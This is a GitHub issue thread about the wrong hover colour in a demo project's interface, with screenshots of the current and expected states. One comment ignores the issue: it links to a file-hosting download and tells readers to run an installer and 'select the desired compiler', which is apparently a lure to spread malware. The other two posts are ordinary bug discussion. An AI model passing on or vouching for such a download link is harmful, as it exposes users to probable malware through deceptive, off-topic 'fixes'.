### ISSUE TITLE
Other color of the hover

### ISSUE THREAD

**Issue by MaxSemenchuk** [muqa-org/demo#78]
Now
<img width="1276" alt="image" src="https://github.com/user-attachments/assets/ab1fe15b-1c0a-45a4-89b5-ebcaddf5a7e5">

Should be 

<img width="108" alt="image" src="https://github.com/user-attachments/assets/c18f9c6e-b8e8-4c8d-98d4-18d9c7040df2">

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by tomislavmamic** [comment]
For me, hover state looks like this 
![CleanShot 2024-09-11 at 11 21 15](https://github.com/user-attachments/assets/9b9c3b23-64cb-45ab-8bd2-089b75a2a93b)
